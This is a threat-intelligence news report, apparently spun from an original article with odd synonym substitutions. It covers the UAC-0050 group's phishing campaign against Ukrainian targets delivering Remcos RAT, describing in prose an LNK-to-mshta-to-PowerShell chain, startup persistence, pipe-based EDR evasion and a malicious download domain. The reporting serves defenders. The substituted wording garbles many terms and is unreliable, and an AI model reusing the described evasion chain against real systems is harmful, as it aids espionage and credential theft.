The menace actor referred to as UAC-0050 is leveraging phishing assaults to distribute Remcos RAT utilizing new methods to evade detection from safety software program.
“The group’s weapon of selection is Remcos RAT, a infamous malware for distant surveillance and management, which has been on the forefront of its espionage arsenal,” Uptycs safety researchers Karthickkumar Kathiresan and Shilpesh Trivedi mentioned in a Wednesday report.
“Nonetheless, of their newest operational twist, the UAC-0050 group has built-in a pipe methodology for interprocess communication, showcasing their superior adaptability.”
UAC-0050, energetic since 2020, has a historical past of concentrating on Ukrainian and Polish entities through social engineering campaigns that impersonate reputable organizations to trick recipients into opening malicious attachments.
In February 2023, the Laptop Emergency Response Staff of Ukraine (CERT-UA) attributed the adversary to a phishing marketing campaign designed to ship Remcos RAT.
Over the previous few months, the identical trojan has been distributed as a part of at the very least three completely different phishing waves, with one such assault additionally resulting in the deployment of an data stealer referred to as Meduza Stealer.
The evaluation from Uptycs relies on a LNK file it found on December 21, 2023. Whereas the precise preliminary entry vector is presently unknown, it is suspected to have concerned phishing emails concentrating on Ukrainian army personnel that declare to promote consultancy roles with the Israel Protection Forces (IDF).
The LNK file in query collects data concerning antivirus merchandise put in on the goal laptop, after which proceeds to retrieve and execute an HTML software named “6.hta” from a distant server utilizing mshta.exe, a Home windows-native binary for operating HTA information.
This step paves the best way for a PowerShell script that unpacks one other PowerShell script to obtain two information referred to as “word_update.exe” and “ofer.docx” from the area new-tech-savvy[.]com.
Operating word_update.exe causes it to create a duplicate of itself with the identify fmTask_dbg.exe and set up persistence by making a shortcut to the brand new executable within the Home windows Startup folder.
The binary additionally employs unnamed pipes to facilitate the trade of information between itself and a newly spawned little one course of for cmd.exe as a way to finally decrypt and launch the Remcos RAT (model 4.9.2 Professional), which is able to harvesting system knowledge and cookies and login data from internet browsers like Web Explorer, Mozilla Firefox, and Google Chrome.
“Leveraging pipes inside the Home windows working system gives a covert channel for knowledge switch, skillfully evading detection by Endpoint Detection and Response (EDR) and antivirus techniques,” the researchers mentioned.
“Though not solely new, this method marks a big leap within the sophistication of the group’s methods.”
